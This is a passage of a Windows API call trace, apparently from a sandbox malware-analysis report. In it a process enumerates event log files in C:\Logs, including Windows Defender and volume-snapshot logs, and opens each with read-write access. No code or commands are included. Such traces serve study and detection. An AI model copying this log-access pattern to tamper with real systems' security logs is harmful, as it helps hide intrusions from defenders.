Size=0x84) returned 0x82328 [0087.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x82328, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 66 [0087.583] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.583] GetFileType (hFile=0x424) returned 0x1 [0087.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82328 | out: hHeap=0x20000) returned 1 [0087.583] CloseHandle (hObject=0x424) returned 1 [0087.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0087.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0087.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0087.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0087.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0087.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0087.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0087.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0087.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0087.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0087.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0087.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0087.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0087.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0087.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0087.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0087.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0087.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0087.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0087.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0087.584] AreFileApisANSI () returned 1 [0087.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0087.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82688 [0087.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 66 [0087.584] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b97f64, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b97f64, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0087.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0087.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.585] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc986efe1, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc986efe1, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Wcmsvc%4Operational.evtx", cAlternateFileName="MI72BF~1.EVT")) returned 1 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0087.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0087.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0087.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0087.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0087.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0087.585] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0087.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0087.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.586] AreFileApisANSI () returned 1 [0087.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx", lpUsedDefaultChar=0x0) returned 51 [0087.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0087.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0087.586] AreFileApisANSI () returned 1 [0087.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0087.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46128 [0087.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46128, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 51 [0087.586] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.586] GetFileType (hFile=0x424) returned 0x1 [0087.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0087.587] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.587] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.587] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.587] CloseHandle (hObject=0x424) returned 1 [0087.587] AreFileApisANSI () returned 1 [0087.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0087.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x466d8 [0087.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x466d8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 51 [0087.587] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.587] GetFileType (hFile=0x424) returned 0x1 [0087.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0087.588] CloseHandle (hObject=0x424) returned 1 [0087.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0087.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0087.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.588] AreFileApisANSI () returned 1 [0087.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0087.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45e88 [0087.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 51 [0087.588] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc986efe1, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc986efe1, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0087.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.589] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb426548, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb426548, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Windows Defender%4Operational.evtx", cAlternateFileName="MI7501~1.EVT")) returned 1 [0087.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e00 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0087.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e00 | out: hHeap=0x20000) returned 1 [0087.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8ce30 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0087.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0087.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0087.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0087.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0087.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0087.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0087.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0087.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0087.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0087.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0087.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0087.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0087.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0087.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0087.590] AreFileApisANSI () returned 1 [0087.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx", lpUsedDefaultChar=0x0) returned 61 [0087.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0087.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0087.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0087.590] AreFileApisANSI () returned 1 [0087.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0087.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e4f8 [0087.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e4f8, cchWideChar=61 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 61 [0087.590] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.591] GetFileType (hFile=0x424) returned 0x1 [0087.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0087.591] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.591] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.591] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.591] CloseHandle (hObject=0x424) returned 1 [0087.591] AreFileApisANSI () returned 1 [0087.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0087.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6ea48 [0087.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=61 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 61 [0087.592] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.592] GetFileType (hFile=0x424) returned 0x1 [0087.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.592] CloseHandle (hObject=0x424) returned 1 [0087.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0087.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0087.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0087.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0087.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | 